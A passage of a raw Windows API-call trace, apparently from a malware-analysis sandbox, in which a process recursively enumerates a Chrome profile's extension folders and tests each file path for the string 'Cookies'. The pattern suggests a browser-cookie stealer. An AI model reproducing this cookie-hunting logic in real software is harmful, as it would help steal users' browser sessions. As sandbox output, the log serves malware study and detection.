RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x9173a0 [0163.276] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" [0163.276] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*.*" [0163.276] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.276] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.276] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.276] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.276] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.276] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.276] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned 137 [0163.276] lstrlenW (lpString="\\") returned 1 [0163.276] GetProcessHeap () returned 0x8e0000 [0163.276] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x9174c8 [0163.276] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" [0163.276] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\" [0163.276] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\") returned 138 [0163.277] lstrlenW (lpString="messages.json") returned 13 [0163.277] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\" [0163.277] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" [0163.277] VirtualQuery (in: lpAddress=0x9174c8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.277] GetProcessHeap () returned 0x8e0000 [0163.277] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9174c8 | out: hHeap=0x8e0000) returned 1 [0163.277] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", lpSrch="Cookies") returned 0x0 [0163.277] VirtualQuery (in: lpAddress=0x9175e8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.277] GetProcessHeap () returned 0x8e0000 [0163.277] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9175e8 | out: hHeap=0x8e0000) returned 1 [0163.277] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.277] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.277] VirtualQuery (in: lpAddress=0x9173a0, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.277] GetProcessHeap () returned 0x8e0000 [0163.277] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9173a0 | out: hHeap=0x8e0000) returned 1 [0163.277] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.277] GetProcessHeap () returned 0x8e0000 [0163.277] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0163.277] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="el", cAlternateFileName="")) returned 1 [0163.277] lstrcmpiW (lpString1="el", lpString2=".") returned 1 [0163.277] lstrcmpiW (lpString1="el", lpString2="..") returned 1 [0163.277] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.278] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.278] lstrlenW (lpString="\\") returned 1 [0163.278] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.278] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.278] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.278] lstrlenW (lpString="el") returned 2 [0163.278] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.278] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" [0163.278] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.278] GetProcessHeap () returned 0x8e0000 [0163.278] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0163.278] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned 137 [0163.278] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned 137 [0163.278] lstrlenW (lpString="\\*.*") returned 4 [0163.278] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" [0163.278] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*.*" [0163.278] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.278] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.279] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.279] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.279] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.279] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857e35d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.279] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned 137 [0163.279] lstrlenW (lpString="\\") returned 1 [0163.279] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el" [0163.279] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\" [0163.279] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\") returned 138 [0163.279] lstrlenW (lpString="messages.json") returned 13 [0163.279] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\" [0163.279] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" [0163.279] VirtualQuery (in: lpAddress=0x9174c8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.279] GetProcessHeap () returned 0x8e0000 [0163.279] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9174c8 | out: hHeap=0x8e0000) returned 1 [0163.279] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json", lpSrch="Cookies") returned 0x0 [0163.279] VirtualQuery (in: lpAddress=0x9175e8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.279] GetProcessHeap () returned 0x8e0000 [0163.279] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9175e8 | out: hHeap=0x8e0000) returned 1 [0163.279] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857e35d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.279] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.279] VirtualQuery (in: lpAddress=0x9173a0, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.279] GetProcessHeap () returned 0x8e0000 [0163.279] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9173a0 | out: hHeap=0x8e0000) returned 1 [0163.279] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.280] GetProcessHeap () returned 0x8e0000 [0163.280] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0163.280] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857e1690, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="en_GB", cAlternateFileName="")) returned 1 [0163.280] lstrcmpiW (lpString1="en_GB", lpString2=".") returned 1 [0163.280] lstrcmpiW (lpString1="en_GB", lpString2="..") returned 1 [0163.280] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.280] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.280] lstrlenW (lpString="\\") returned 1 [0163.280] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.280] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.280] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.280] lstrlenW (lpString="en_GB") returned 5 [0163.280] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.280] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 